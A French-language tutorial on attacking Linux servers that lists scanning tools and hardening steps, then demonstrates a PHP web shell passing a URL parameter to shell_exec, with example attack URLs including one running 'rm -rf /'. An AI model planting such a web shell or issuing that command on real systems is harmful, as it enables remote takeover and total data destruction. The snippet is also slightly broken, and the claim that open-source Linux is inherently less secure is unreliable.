Hacking Linux OS : Piratage avec Ubuntu (Tutoriel de commandes)

Linux est le système d’exploitation pour serveur le plus utilisé, notamment pour les serveurs web. Il est open source ; cela signifie que l’on peut avoir accès au code source. Cela le rend moins sûr que d’autres systèmes d’exploitation, car les attaquants peuvent étudier le code source pour trouver des vulnérabilités. Linux for Hackers porte sur l’exploitation de ces vulnérabilités pour obtenir un accès non autorisé à un système.

Dans cet article, nous vous présenterons ce qu’est Linux, ses failles de sécurité, le piratage avec Ubuntu et les contre-mesures que vous pouvez mettre en place.

Sujets couverts dans ce tutoriel

  • Note rapide sur Linux
  • Outils de piratage de Linux
  • Comment prévenir les piratages de Linux
  • Activité de piratage : Pirater un système Linux en utilisant PHP

Note rapide sur Linux

Linux est un système d’exploitation open source. Il existe de nombreuses distributions de systèmes d’exploitation basés sur Linux, comme Redhat, Fedora et Ubuntu, etc. Contrairement aux autres systèmes d’exploitation, Linux est moins sûr en matière de sécurité. Ceci est dû au fait que le code source est disponible gratuitement, il est donc facile d’étudier les vulnérabilités et de les exploiter par rapport à d’autres systèmes d’exploitation qui ne sont pas open source. Linux peut être utilisé comme système d’exploitation de serveur, de bureau, de tablette ou de dispositif mobile.

Les programmes Linux peuvent être exploités à l’aide d’une interface graphique ou de commandes. Les commandes Linux pour le piratage de Kali Linux sont plus efficaces et efficientes par rapport à l’utilisation de l’interface graphique. Pour cette raison, il est utile de connaître les commandes Linux de base pour le piratage.

Référez-vous à ces tutoriels https://www.guru99.com/unix-linux-tutorial.html sur la façon de commencer avec les hacks Kali Linux.

Outils de piratage Linux

  • Nessus- cet outil peut être utilisé pour le piratage Ubuntu, scanner les paramètres de configuration, les correctifs et les réseaux, etc. il peut être trouvé à https://www.tenable.com/products/nessus
  • NMap. Cet outil peut être utilisé pour surveiller les hôtes qui fonctionnent sur le serveur et les services qu’ils utilisent. Il peut également être utilisé pour analyser les ports. Il se trouve à l’adresse https://nmap.org/
  • SARA – SARA est l’acronyme de Security Auditor’s Research Assistant. Comme son nom l’indique, cet outil peut être utilisé pour auditer les réseaux contre les menaces telles que l’injection SQL, XSS, etc. il peut être trouvé à l’adresse http://www-arc.com/sara/sara.html

La liste ci-dessus n’est pas exhaustive ; elle vous donne une idée des outils disponibles pour le piratage d’Ubuntu et le piratage des systèmes Linux.

Comment prévenir les piratages de Linux

Le piratage de Linux profite des vulnérabilités du système d’exploitation. Une organisation peut adopter la politique suivante pour se protéger contre ces attaques.

  • Gestion des correctifs – les correctifs corrigent les bogues que les attaquants exploitent pour compromettre un système. Une bonne politique de gestion des correctifs vous permettra de vous assurer que vous appliquez constamment les correctifs pertinents à votre système.
  • Configuration appropriée du système d’exploitation- d’autres exploits tirent parti des faiblesses de la configuration du serveur. Les noms d’utilisateurs et les démons inactifs doivent être désactivés. Les paramètres par défaut tels que les mots de passe communs à l’application, les noms d’utilisateur par défaut et certains numéros de port devraient être modifiés.
  • Système de détection d’intrusion- de tels outils peuvent être utilisés pour détecter les accès non autorisés au système. Certains outils ont la capacité de détecter et de prévenir de telles attaques.

Activité de piratage : Pirater un système Linux Ubuntu en utilisant PHP

Dans ce scénario pratique, nous allons apprendre à pirater Ubuntu et nous vous fournirons des informations de base sur la façon dont vous pouvez utiliser PHP pour compromettre un Linux. Nous n’allons pas cibler de victime. Si vous voulez l’essayer, vous pouvez installer LAMPP sur votre machine locale.

PHP est livré avec deux fonctions qui peuvent être utilisées pour exécuter des commandes de piratage Linux. Il dispose des fonctions exec() et shell_exec(). La fonction exec() renvoie la dernière ligne de la sortie de la commande tandis que la fonction shell_exec() renvoie le résultat entier de la commande sous forme de chaîne.

A des fins de démonstration, supposons que les responsables de l’attaquant téléchargent le fichier suivant sur un serveur web.

<?php$cmd = isset($_GET) ? $_GET : 'ls -l';echo "executing shell command:-> $cmd</br>";$output = shell_exec($cmd);echo "<pre>$output</pre>";?>

ICI,

Le script ci-dessus obtient la commande de la variable GET nommée cmd. La commande est exécutée en utilisant shell_exec() et les résultats sont renvoyés dans le navigateur.

Le code ci-dessus peut être exploité en utilisant l’URL suivante

http://localhost/cp/konsole.php?cmd=ls%20-l

ICI,

  • « …konsole.php?cmd=ls%20-l « attribue la valeur ls -l à la variable cmd.

La commande dans Ubuntu pour le piratage contre le serveur sera exécutée comme

shell_exec('ls -l') ;

L’exécution du code ci-dessus sur un serveur web donne des résultats similaires à ce qui suit.

La commande ci-dessus affiche simplement les fichiers dans le répertoire actuel et les permissions

Supposons que l’attaquant passe la commande suivante

rm -rf /

ICI,

  • « rm » supprime les fichiers
  • « rf » fait fonctionner la commande rm en mode récursif. Supprimant tous les dossiers et fichiers
  • « / » ordonne à la commande de commencer à supprimer les fichiers du répertoire racine

L’URL de l’attaque ressemblerait à quelque chose comme ceci

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Résumé

  • Linux est un système d’exploitation populaire pour les serveurs, les ordinateurs de bureau, les tablettes et les appareils mobiles.
  • Linux est une source ouverte, et le code source peut être obtenu par n’importe qui. Il est donc facile de repérer les vulnérabilités. C’est l’un des meilleurs OS pour les pirates.
  • Les commandes de base et de piratage réseau dans Ubuntu sont précieuses pour les pirates Linux.
  • Les vulnérabilités sont une faiblesse qui peut être exploitée pour compromettre un système.
  • Une bonne sécurité peut aider à protéger un système d’être compromis par un attaquant.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée.